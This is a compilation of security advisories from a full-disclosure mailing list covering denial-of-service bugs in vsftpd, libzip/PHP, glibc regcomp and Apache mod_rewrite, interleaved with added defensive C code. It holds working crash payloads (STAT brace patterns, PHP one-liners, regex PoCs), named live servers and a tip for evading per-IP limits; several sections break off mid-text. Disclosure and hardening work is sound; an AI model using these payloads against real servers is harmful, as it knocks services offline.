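static unsigned long parse_group(const char **pp, unsigned long limit, int *bad)
{
    unsigned long total = 0;

    for (;;) {
        unsigned long n = parse_seq(pp, 1, limit, bad);
        if (*bad)
            return 0;
        total += n;
        if (total > limit) {            /* too many alternatives */
            *bad = 1;
            return 0;
        }
        if (**pp == ',') {
            ++*pp;
            continue;
        }
        if (**pp == '}') {
            ++*pp;
            return total;
        }
        *bad = 1;                       /* pattern ended inside a group */
        return 0;
    }
}

/* A run of segments.  Inside a group it stops at ',' or '}' (left for the
 * caller); at top level those characters are ordinary text. */
static unsigned long parse_seq(const char **pp, int in_group,
                               unsigned long limit, int *bad)
{
    unsigned long prod = 1;
    const char *p = *pp;

    while (*p != '\0') {
        if (in_group && (*p == ',' || *p == '}'))
            break;
        if (*p == '\\' && p[1] != '\0') {   /* escaped character */
            p += 2;
            continue;
        }
        if (*p == '{') {
            unsigned long n;
            ++p;
            n = parse_group(&p, limit, bad);
            if (*bad)
                return 0;
            if (prod > limit / n) {         /* prod * n would exceed limit */
                *bad = 1;
                return 0;
            }
            prod *= n;
            continue;
        }
        ++p;
    }
    *pp = p;
    return prod;
}

/* Number of paths 'pattern' expands to, or 0 if that exceeds 'limit' or
 * the braces are malformed.  A caller should reject the request on 0. */
unsigned long brace_expansion_count(const char *pattern, unsigned long limit)
{
    int bad = 0;
    const char *p = pattern;
    unsigned long n = parse_seq(&p, 0, limit, &bad);
    return bad ? 0 : n;
}

/* Twenty {a,b} groups: 2^20 expansions, the shape of the STAT PoC above. */
#define BRACE_POC "{a,b}{a,b}{a,b}{a,b}{a,b}" "{a,b}{a,b}{a,b}{a,b}{a,b}" \
                  "{a,b}{a,b}{a,b}{a,b}{a,b}" "{a,b}{a,b}{a,b}{a,b}{a,b}"

int main(void)
{
    printf("{a,b}{a,b}{a,b}      -> %lu\n", brace_expansion_count("{a,b}{a,b}{a,b}", 1000000UL));
    printf("20 groups, limit 1e6 -> %lu (0 = reject)\n", brace_expansion_count(BRACE_POC, 1000000UL));
    printf("20 groups, limit 2e6 -> %lu\n", brace_expansion_count(BRACE_POC, 2000000UL));
    return 0;
}
```

The count is purely syntactic, so it is cheap and independent of the filesystem; the 66-group PoC pattern is rejected after reading a handful of bytes, long before the 2^66 gl_pathv slots would be requested.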

Many servers are still vulnerable to the above vulnerability and to
CVE-2010-4754, CVE-2010-4755, CVE-2010-4756 and CVE-2010-2632. Servers
like ftp.sun.com and ftp.sony.com seem to still be affected.


- --- 2. References ---
http://securityreason.com/achievement_securityalert/89
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.asc
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.avaya.com/css/P8/documents/10012789

[Full-disclosure] libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)

2011-03-18 Thread Maksymilian Arciemowicz

[ libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 03.01.2011
- - Pub.: 18.03.2011

CVE: CVE-2011-0421
CERT: VU#325039

Affected Software:
- - libzip 0.9.3
- - PHP 5.3.5 (fixed 5.3.6)

Original URL:
http://securityreason.com/achievement_securityalert/96


- --- 0.Description ---
libzip is a C library for reading, creating, and modifying zip archives.
Files can be added from data buffers, files, or compressed data copied
directly from other zip archives. Changes made without closing the
archive can be reverted. The API is documented by man pages.


- --- 1.Description ---
libzip allows remote and local attackers to cause a denial of service
(NULL pointer dereference) when the ZIP_FL_UNCHANGED flag is set.

- -lib/zip_name_locate.c---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
                 struct zip_error *error)
{
    int (*cmp)(const char *, const char *);
    const char *fn, *p;
    int i, n;

    if (fname == NULL) {
        _zip_error_set(error, ZIP_ER_INVAL, 0);
        return -1;
    }

    cmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;

    n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=== CRASH HERE
- -lib/zip_name_locate.c---

For an empty zip file and the ZIP_FL_UNCHANGED flag, libzip crashes.
For PHP we currently estimate the security impact only as a remote DoS,
so the risk is low.
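As an added example in C, not libzip's or PHP's code: a mock of the entry-table selection in _zip_name_locate(), the vulnerable form next to a hardened one. When ZIP_FL_UNCHANGED is requested on an archive that has no central directory yet (the empty-archive state the PoCs reach, modelled here as cdir == NULL), the hardened version reports "not found" instead of dereferencing NULL. The struct layout, the flag bit values and the names are assumptions of this example.

```c
/* Added example (not libzip or PHP code): the entry-table selection of
 * _zip_name_locate(), vulnerable and hardened, over a minimal mock of
 * struct zip.  Flag bit values and the struct layout are assumptions. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define ZIP_FL_NOCASE    1u
#define ZIP_FL_UNCHANGED 8u

struct mock_cdir { int nentry; const char **name; };   /* central directory as read from disk */
struct mock_zip  { struct mock_cdir *cdir;            /* NULL for an empty or new archive */
                   int nentry; const char **name; };   /* current (possibly modified) entries */

/* strcmp, or a case-folded compare when ZIP_FL_NOCASE is set. */
static int name_cmp(unsigned flags, const char *a, const char *b)
{
    if (!(flags & ZIP_FL_NOCASE))
        return strcmp(a, b);
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            break;
    return tolower((unsigned char)*a) - tolower((unsigned char)*b);
}

/* Vulnerable form, as in zip_name_locate.c: za->cdir is dereferenced
 * whenever ZIP_FL_UNCHANGED is set, although an empty archive has none. */
int name_locate_vuln(const struct mock_zip *za, const char *fname, unsigned flags)
{
    int n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;
    const char **names = (flags & ZIP_FL_UNCHANGED) ? za->cdir->name : za->name;
    for (int i = 0; i < n; i++)
        if (name_cmp(flags, names[i], fname) == 0)
            return i;
    return -1;
}

/* Hardened form: no central directory means there are no unchanged
 * entries to search, so the lookup simply fails. */
int name_locate_safe(const struct mock_zip *za, const char *fname, unsigned flags)
{
    int n;
    const char **names;
    if (flags & ZIP_FL_UNCHANGED) {
        if (za->cdir == NULL)
            return -1;
        n = za->cdir->nentry;
        names = za->cdir->name;
    } else {
        n = za->nentry;
        names = za->name;
    }
    for (int i = 0; i < n; i++)
        if (name_cmp(flags, names[i], fname) == 0)
            return i;
    return -1;
}

/* Two constructed archives: scenario 0 is empty (the PoC state),
 * scenario 1 has "a.txt" and "B.txt" in its central directory. */
static const char *two_names[] = { "a.txt", "B.txt" };
static struct mock_cdir two_cdir = { 2, two_names };

int locate_in_scenario(int scenario, const char *fname, unsigned flags)
{
    struct mock_zip za = { NULL, 0, NULL };
    if (scenario == 1) {
        za.cdir = &two_cdir;
        za.nentry = 2;
        za.name = two_names;
    }
    return name_locate_safe(&za, fname, flags);
}
```

name_locate_vuln() is kept only for comparison; calling it with scenario 0 and ZIP_FL_UNCHANGED is the crash the advisory describes, which is why locate_in_scenario() routes through the hardened function.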

Projects using libzip: KDE Utilities (4.x branch), MySQL Workbench,
ckmame, fuse-zip, php zip extension, Endeavour2, FreeDink

A more detailed analysis based on PHP's ZipArchive code follows.


- --- 2. PHP 5.3.5 ZipArchive() ---
PoC1:
php -r '$nx=new ZipArchive();$nx->open("/dev/null");$nx->locateName("a",ZIPARCHIVE::FL_UNCHANGED);'

PoC2:
php -r '$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHANGED);'

Let's see:
- -php_zip.c-
...
static ZIPARCHIVE_METHOD(locateName)
{
...
ZIP_FROM_OBJECT(intern, this);

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l",
&name, &name_len, &flags) == FAILURE) {
return;
}
...
    idx = (long)zip_name_locate(intern, (const char *)name, flags); <=== CRASH IN THIS FUNCTION
...
- -php_zip.c-

and let's see

- -zip_name_locate.c-
ZIP_EXTERN(int)
zip_name_locate(struct zip *za, const char *fname, int flags)
{
return _zip_name_locate(za, fname, flags, &za->error);
}


int
_zip_name_locate(struct zip *za, const char *fname, int flags,
 struct zip_error *error)
{
int (*cmp)(const char *, const char *);
const char *fn, *p;
int i, n;

if (fname == NULL) {
_zip_error_set(error, ZIP_ER_INVAL, 0);
return -1;
}

cmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;

    n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=== CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED
    for (i=0; i<n; i++) {
...
- -zip_name_locate.c-

n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;
(gdb) print za->cdir->nentry
Cannot access memory at address 0x8
(gdb) print za->nentry
$21 = 0

because

(gdb) x/i $rip
=> 0x6407cc <_zip_name_locate+236>: mov    0x8(%rax),%eax
(gdb) x/i $rax
   0x0: Cannot access memory at address 0x0
(gdb) x/i $eax

call to zip_name_locate

(gdb) n
1877idx = (long)zip_name_locate(intern, (const char *)name,
flags);
(gdb) print intern
$24 = (struct zip *) 0x118d580
(gdb) x/x intern
0x118d580:  0x0118d220
(gdb) x/40x intern
0x118d580:  0x0118d220  0x  0x0118d340  0x
0x118d590:  0x  0x  0x  0x
0x118d5a0:  0x  0x  0x  0x
0x118d5b0:  0x  0x  0x  0x
0x118d5c0:  0x  0x  0x  0x
0x118d5d0:  0x  0x  0x  0x
0x118d5e0:  0x  0x  0x00020a21  0x
0x118d5f0:  0x  0x  0x  0x
0x118d600:  0x  0x  0x  0x
0x118d610:  0x  0x  0x  0x


Next, PoC2:

$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("9223372036854775808","9223372036854775807");

Program received signal SIGSEGV, Segmentation fault.
0x006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0
"9223372036854775808", flags=32767, error=0xdac0) at
/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
65  in /build/buildd/php5-5.3.3

[Full-disclosure] vsftpd 2.3.2 remote denial-of-service

2011-03-01 Thread Maksymilian Arciemowicz

[ vsftpd 2.3.2 remote denial-of-service ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 23.12.2010
- - Pub.: 01.03.2011

CVE: CVE-2011-0762
CERT: VU#590604

Fix: vsftpd 2.3.4 (15.02.2011)

Affected Software (verified):
- - vsftpd 2.3.2 (NetBSD 5.1)
- - vsftpd 2.3.0 (Ubuntu 10.10)

Affected Servers (19.02.2011):
- - ftp.gnu.org (2.0.6)
- - ftp.kernel.org (2.2.2)
- - ftpgen.wip4.adobe.com (2.3.2)
- - ftp.oracle.com (2.0.5)
- - ftp.freebsd.org (2.2.0)
- - more more more...

Original URL:
http://securityreason.com/achievement_securityalert/95


- --- 0.Description ---
vsftpd is a GPL licensed FTP server for UNIX systems, including Linux.
It is secure and extremely fast. It is stable. Don't take my word for
it, though. Below, we will see evidence supporting all three assertions.
We will also see a list of a few important sites which are happily using
vsftpd. This demonstrates vsftpd is a mature and trusted solution.


- --- 1. vsftpd 2.3.2 remote denial-of-service ---
As we can read in the vsftpd file ls.c:

- ---
...
   * parsing and handling. There is broad potential for any given fnmatch(3)
   * implementation to be buggy.
   *
   * Currently supported pattern(s):
   * - any number of wildcards, "*" or "?"
   * - {,} syntax (not nested)
...
- ---

That is true, but anyone who has switched from the BSD ftpd daemon to
vsftpd to protect against CVE-2010-2632 (glob(3) resource exhaustion) is
in danger. Any code of huge complexity can allow a denial of service if
an affected system receives a vulnerable pattern. This bug allows a wide
range of servers to be disabled. To identify vulnerable servers, we have
to use a pattern of medium complexity.

- -Example affected server---
cx@cx64:~$ telnet ftp.gnu.org 21
Trying 140.186.70.20...
Connected to ftp.gnu.org.
Escape character is '^]'.
220 GNU FTP server ready.
USER anonymous
PASS a...@cadabra.abw
STAT {{*},}
...
230 Login successful.
230 Already logged in.
213-Status follows:

- -Example affected server---

Execution time may vary widely depending on the length of the pattern:

empty     2388 97.3  0.0  37980  1352 ?   R    Dec23 222:42 /usr/sbin/vsftpd

222m and counting...

so each further {{*},Recursion} increases the complexity. Let's see what
is wrong and where. In vsftpd the main problem exists in ls.c.

- -ls.c--
int
vsf_filename_passes_filter(const struct mystr* p_filename_str,
                           const struct mystr* p_filter_str)
{
...
    else if (last_token == '{')
    {
      struct str_locate_result end_brace =
        str_locate_char(&filter_remain_str, '}');
      must_match_at_current_pos = 1;
      if (end_brace.found)
      {
        str_split_char(&filter_remain_str, &temp_str, '}');
        str_copy(&brace_list_str, &filter_remain_str);
        str_copy(&filter_remain_str, &temp_str);
        str_split_char(&brace_list_str, &temp_str, ',');
        while (!str_isempty(&brace_list_str))
        {
          str_copy(&new_filter_str, &brace_list_str);
          str_append_str(&new_filter_str, &filter_remain_str);
          if (vsf_filename_passes_filter(&name_remain_str,
                                         &new_filter_str))   <= LIMIT THIS CALL
          {
            ret = 1;
...
- -ls.c--

Code:
    if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str))   <= LIMIT THIS CALL

This call should be limited; it has been fixed in version 2.3.4.

A simple way to show the growth in computing effort:
(1*2*3*4*...*count(vsf_filename_passes_filter complexity)) ==
count(vsf_filename_passes_filter complexity)!

Compare the two patterns and see the difference between

STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}

and add next {*,...}

STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}

and in the end, compare:
STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}

However, in vsftpd the command length is allowed up to 4096 bytes, so it
is no problem to create a request of huge complexity.

To bypass max_per_ip, use an ISP with dynamic IP addresses. Disconnect
and connect again (example for a mobile phone connected over Bluetooth):

cx@cx64:~$ hciconfig hci0 down
cx@cx64:~$ hciconfig hci0 up

and connect again.

- ---PoC

Re: [Full-disclosure] glibc and alloca()

2011-02-25 Thread Maksymilian Arciemowicz
Chris Evans  gmail.com> writes:
> Linux distribution might still have vulnerabilities in this area.

proftpd uses the GNU libc implementation

http://www.proftpd.org/docs/RELEASE_NOTES-1.3.4rc1
  + Updated fnmatch implementation, using glibc-2.9 version.

Version 1.3.3d may contain this issue

-- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid  Maksymilian Arciemowicz (cx) 
sub   4096R/58BA663C 2010-09-19




[Full-disclosure] PHP 5.3.5 grapheme_extract() NULL Pointer Dereference

2011-02-16 Thread Maksymilian Arciemowicz

[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 09.12.2010
- - Pub.: 17.02.2011

CVE: CVE-2011-0420
CERT: VU#210829

Affected Software:
- - PHP 5.3.5

Fixed: SVN

Original URL:
http://securityreason.com/achievement_securityalert/94


- --- 0.Description ---
Internationalization extension (further is referred as Intl) is a
wrapper for ICU library, enabling PHP programmers to perform
UCA-conformant collation and date/time/number/currency formatting in
their scripts.

grapheme_extract - Function to extract a sequence of default grapheme
clusters from a text buffer, which must be encoded in UTF-8.


- --- 1. PoC for grapheme_extract() ---
grapheme_extract('a',-1);

Changing the length of the first parameter changes rip.


- --- 2. grapheme_extract() NULL Pointer Dereference ---
As we can see in grapheme_extract(str,size)

- -grapheme_extract()--
...
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str,
            &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {   <=== str='a' and size='-1'
...
    /* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done.
       (size + 1 because the size-th character might be the beginning of a grapheme cluster)
     */

    if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) { <=== ( size=-1+1=0 )
        long nsize = ( size < str_len ? size : str_len );  <=== nsize = -1
        if ( NULL != next ) {
            ZVAL_LONG(next, start+nsize);
        }
        RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT
    }
...
- -grapheme_extract()--

If we call grapheme_ascii_check(pstr, 0), where

- -grapheme_ascii_check()--
/* {{{ grapheme_ascii_check: ASCII check */
int grapheme_ascii_check(const unsigned char *day, int32_t len) <=== len=0
{
    int ret_len = len;
    while ( len-- ) {
        if ( *day++ > 0x7f )
            return -1;
    }

    return ret_len; <=== return 0
}
- -grapheme_ascii_check()--

then we get (int)0 as the result, and

long nsize = ( size < str_len ? size : str_len );

will be -1. Therefore

RETURN_STRINGL(((char *)pstr), nsize, 1);

gives a NULL pointer dereference here.

By changing the length of the first parameter of grapheme_extract(), we
also change rip in memcpy(3).

(gdb) r -r 'grapheme_extract('a',-1);'
...
(gdb) x/i $rip
=> 0x75511d99:  mov    %rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70
(gdb) x/x $rdi
0x11b2000:  Cannot access memory at address 0x11b2000
(gdb) r -r 'grapheme_extract('aaa',-1);'
...
(gdb) x/i $rip
=> 0x75511d77:  mov    0x18(%rsi),%r10
(gdb) x/x $rsi
0x11b1fe8:  0x

- --- 3. Fix ---
SVN:
http://svn.php.net/viewvc?view=revision&revision=306449


- --- 4. Greets ---
Pierre, Stas, sp3x, infospec


- --- 5. Contact ---
Author: Maksymilian Arciemowicz [ SecurityReason.com ]

Email:
- - cxib {a\./t]securityreason[d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://cxib.net/

- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid  Maksymilian Arciemowicz (cx) 
sub   4096R/58BA663C 2010-09-19

Re: [Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities

2011-01-11 Thread Maksymilian Arciemowicz

On 01/11/2011 04:33 PM, halfdog wrote:
> 
> Nice find, but not the first one, look at:
> 
> https://bugs.launchpad.net/ubuntu/+source/glibc/+bug/343894
> 
> I just reported the issue to ubuntu so see how their bug tracking team
> was performing on an issue where a standard byte-array-fuzzer just
> needed 2secs to find it. I wanted to know, if they could detect a
> misclassified issue (was not reported as security bug) and bring it to a
> fix. I would have bet, that they would be faster than you, but it seems
> that you made the race. What I learned from the excercise (see bug
> report date March 2009), is that the ubuntu launchpad platform is an
> invaluable source of exploits when used together with google mining.

I agree with you, but in my opinion the Ubuntu tracking team has nothing
to do here. The main problem exists in the GNU libc code, so that team
should fix the problem. Just compare regcomp(3)/BSD and regcomp(3)/Linux.
In my opinion the GNU libc implementation is the worst in terms of safety.
Probably the vulnerability in glob(3) (CVE-2010-2632) can be used for
resource exhaustion in the GNU inetutils FTP server.


- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid  Maksymilian Arciemowicz (cx) 
sub   4096R/58BA663C 2010-09-19

[Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities

2011-01-07 Thread Maksymilian Arciemowicz

[ GNU libc/regcomp(3) Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 01.10.2010
- - Pub.: 07.01.2011

CERT: VU#912279
CVE:
CVE-2010-4051
CVE-2010-4052

Affected (tested):
- - Ubuntu 10.10
- - Slackware 13
- - Gentoo 18.10.2010
- - FreeBSD 8.1 (grep(1))
- - NetBSD 5.0.2 (grep(1))

Original URL:
http://securityreason.com/achievement_securityalert/93

Exploit for proftpd:
http://cxib.net/stuff/proftpd.gnu.c


- --- 0.Description ---
The GNU C library is used as the C library in the GNU system and most
systems with the Linux kernel.

# define RE_DUP_MAX (0x7fff)

regcomp() is used to compile a regular expression into a form that is
suitable for subsequent regexec() searches.


- --- 1. RE_DUP_MAX overflow ---
The main problem exists in the regcomp(3) function of the GNU libc
implementation. Let's try to understand it.

- ---
int
regcomp (preg, pattern, cflags)
regex_t *__restrict preg;
const char *__restrict pattern;
int cflags;
{
- ---

If we use '{', the token type will be OP_OPEN_DUP_NUM.

- ---
/* This function parse repetition operators like "*", "+", "{1,3}" etc.  */

static bin_tree_t *
parse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,
  re_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)
{
  bin_tree_t *tree = NULL, *old_tree = NULL;
  int i, start, end, start_idx = re_string_cur_idx (regexp);
  re_token_t start_token = *token;

  if (token->type == OP_OPEN_DUP_NUM)
{
  end = 0;
  start = fetch_number (regexp, token, syntax); <= CONVERT VALUE
- ---

Let's see fetch_number():

- ---
static int
fetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)
{
  int num = -1;
  unsigned char c;
  while (1)
{
  fetch_token (token, input, syntax);
  c = token->opr.c;
  if (BE (token->type == END_OF_RE, 0))
return -2;
  if (token->type == OP_CLOSE_DUP_NUM || c == ',')
break;
  num = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)
 ? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));
  num = (num > RE_DUP_MAX) ? -2 : num;
}
  return num;
}
- ---

Now see regex.h for the value of RE_DUP_MAX:

- ---
/* Maximum number of duplicates an interval can allow.  Some systems
   (erroneously) define this in other header files, but we want our
   value, so remove any previous define.  */
# ifdef RE_DUP_MAX
#  undef RE_DUP_MAX
# endif
/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows.  */
# define RE_DUP_MAX (0x7fff)
#endif
- ---

calc_eclosure_iter() will call calc_eclosure_iter() many times and
crash in malloc(3). Simple recursion.

So we can't use a value bigger than 0x7fff in {n,}. regcomp(3) should return
an error if we use the '{' token more than once.

There are many attack vectors.

grep(1):
c...@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

pgrep(1):
c...@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

bregex from bacula-director-common
c...@cx64:~$ bregex -f glob-0day.c
Enter regex pattern: .*{10,}{10,}{10,}{10,}{10,}
Segmentation fault

whatis(1):
c...@cx64:~$ whatis -r ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

and more, like proftpd.

Simple crash for CVE-2010-4051
(gdb) x/i $rip
=> 0x77ad3ea2:  mov    %eax,0x50(%rsp)
(gdb) x/i $eax
   0x2: Cannot access memory at address 0x2
(gdb) x/i $rsp
   0x7f5fef90:  Cannot access memory at address 0x7f5fef90
(gdb) x/i 0x50($rsp)
Cannot access memory at address 0x7f5fef08


#0  0x77ad3ea2 in ?? () from /lib/libc.so.6
#1  0x77ad538e in malloc () from /lib/libc.so.6
#2  0x77b17d9b in ?? () from /lib/libc.so.6
#3  0x77b17f0b in ?? () from /lib/libc.so.6
#4  0x77b17f0b in ?? () from /lib/libc.so.6
#5  0x77b17f0b in ?? () from /lib/libc.so.6
#6  0x77b17f0b in ?? () from /lib/libc.so.6
#7  0x77b17f0b in ?? () from /lib/libc.so.6
...

- ---PoC1---
#include <regex.h>

int main(){
  regex_t preg;

//  char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052
  char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; // CVE-2010-4051

  regcomp (&preg, fmt, REG_EXTENDED);

  return 0;
}
- ---PoC1---

- --- 2. Stack Exhaustion ---
This issue may also be used for denial of service by stack exhaustion:

#ls |grep -E ".*{10,}{10,}{11,}"

- ---PoC2---
#include <regex.h>

int
main ()
{
  regex_t preg;

  char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052
//  char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; // CVE-2010-4051

  regcomp (&preg, fmt, REG_EXTENDED);

  return 0;
}
- ---PoC2---

Such a pattern may lead to allocation of a large memory area, or a long
execution time.

As we can read in vsftpd/HACKING

- ---
 - do
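
As an added example (not code from the advisory or from glibc), here is the kind of gate an application that accepts patterns from untrusted users can put in front of regcomp(3). All of the crashes quoted above come from interval operators stacked directly on another repetition, so the check refuses that shape and any interval count above a small budget before the library ever sees it. The function names and the 1000 limit are this example's own choices; the gate is deliberately stricter than glibc, which accepts things like "a**".

```c
/* Added example, not from the advisory: gate untrusted patterns before they
 * reach regcomp(3). Every crash above comes from interval operators stacked
 * directly on another repetition (".*{10,}{10,}..."), so a program that takes
 * patterns from users (grep front-ends, ftpd, search forms) can refuse that
 * shape up front. Names and the 1000 limit are this example's own. */
#include <regex.h>
#include <stdbool.h>
#include <stdio.h>

#define MAX_INTERVAL_COUNT 1000   /* far below RE_DUP_MAX (0x7fff) */

/* Returns true when the ERE contains no repetition operator applied directly
 * to another one and no interval count above MAX_INTERVAL_COUNT. Backslash
 * escapes and bracket expressions are skipped so "\{" and "[{]" stay literal.
 * Stricter than glibc, which accepts e.g. "a**". */
bool pattern_is_safe(const char *pat)
{
    bool prev_repeat = false;            /* previous token was * + ? or {m,n} */
    for (const char *p = pat; *p; p++) {
        if (*p == '\\') {                /* escaped character: plain literal */
            if (p[1]) p++;
            prev_repeat = false;
        } else if (*p == '[') {          /* bracket expression: skip to ']' */
            const char *q = p + 1;
            if (*q == '^') q++;
            if (*q == ']') q++;          /* a leading ']' is literal */
            while (*q && *q != ']') q++;
            if (!*q) return false;       /* unterminated: refuse */
            p = q;
            prev_repeat = false;
        } else if (*p == '{') {
            if (prev_repeat) return false;           /* "*{" or "}{" */
            long n = 0;
            const char *q = p + 1;
            for (; *q >= '0' && *q <= '9'; q++) {
                n = n * 10 + (*q - '0');
                if (n > MAX_INTERVAL_COUNT) return false;
            }
            if (*q == ',') {
                long m = 0;
                for (q++; *q >= '0' && *q <= '9'; q++) {
                    m = m * 10 + (*q - '0');
                    if (m > MAX_INTERVAL_COUNT) return false;
                }
            }
            if (*q != '}') return false;             /* malformed interval */
            p = q;
            prev_repeat = true;
        } else if (*p == '*' || *p == '+' || *p == '?') {
            if (prev_repeat) return false;           /* "**", "+*", "}?" */
            prev_repeat = true;
        } else {
            prev_repeat = false;
        }
    }
    return true;
}

/* regcomp(3) wrapper: REG_BADRPT for refused patterns, otherwise regcomp's
 * own return code. */
int regcomp_untrusted(regex_t *preg, const char *pattern, int cflags)
{
    if (!pattern_is_safe(pattern))
        return REG_BADRPT;
    return regcomp(preg, pattern, cflags);
}

/* Compile with the gate and run one match: 1 = match, 0 = no match,
 * -1 = pattern refused or failed to compile. */
int match_untrusted(const char *pattern, const char *subject)
{
    regex_t re;
    if (regcomp_untrusted(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return -1;
    int rc = regexec(&re, subject, 0, NULL, 0);
    regfree(&re);
    return rc == 0 ? 1 : 0;
}

int main(void)
{
    const char *bad = ".*{10,}{10,}{10,}{10,}{10,}";   /* pattern from the advisory */
    printf("%s -> %s\n", bad, pattern_is_safe(bad) ? "compile" : "refused");
    printf("^a{3,5}$ vs aaaa -> %d\n", match_untrusted("^a{3,5}$", "aaaa"));
    return 0;
}
```

The gate is a syntactic pre-check, not a replacement for a patched libc: a fixed regcomp(3) still has to reject the pattern, and a service compiling user patterns should additionally run the compile step under a CPU and memory limit so that a shape the gate does not anticipate cannot take the whole process down.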

[Full-disclosure] Apache Insecure mod_rewrite PCRE Resource Exhaustion

2010-12-20 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ Apache Insecure mod_rewrite PCRE Resource Exhaustion ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 19.09.2010
- - Pub.: 21.12.2010

Affected (tested):
- - NetBSD 5.0.2 (Apache 2.2.17 PHP 5.3.4)
- - Ubuntu 10.10 (Apache 2.2.16 PHP 5.3.3)

Original URL:
http://securityreason.com/achievement_securityalert/92


- --- 0.Description ---
The Apache HTTP Server, commonly referred to as Apache, is web server
software notable for playing a key role in the initial growth of the
World Wide Web. In 2009 it became the first web server software to
surpass the 100 million web site milestone

The PCRE(Perl Compatible Regular Expressions) library is a set of
functions that implement regular expression pattern matching using the
same syntax and semantics as Perl 5. PCRE has its own native API, as
well as a set of wrapper functions that correspond to the POSIX regular
expression API. The PCRE library is free, even for building proprietary
software.


- --- 1. Apache Insecure mod_rewrite PCRE Resource Exhaustion ---
Using mod_rewrite and the PCRE libs can be dangerous for the stability of
the Apache server. Everybody knows that using PCRE regular expressions
generates a possible risk of DoS attack, and using multiple regular
expressions in .htaccess is not a good idea.
I will show the possibility of a DoS attack using .htaccess. Of course we
can try to configure our machine to be safe; anyway, many servers are
affected by this.

Many regular expression implementations have no control over what executes.
Example:

Let's see what will happen in Firefox for this expression:

.*.*.*(\w+)$1

Nothing special.

Try this:

.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(\w+)$1

The result in Firefox JavaScript:
"Warning: Unresponsive script"

Long execution in PCRE generates "Unresponsive script". The same
algorithm can be used in .htaccess:

$ httpd -v && php -v
Server version: Apache/2.2.17 (Unix)
Server built:   Nov 11 2010 19:51:37
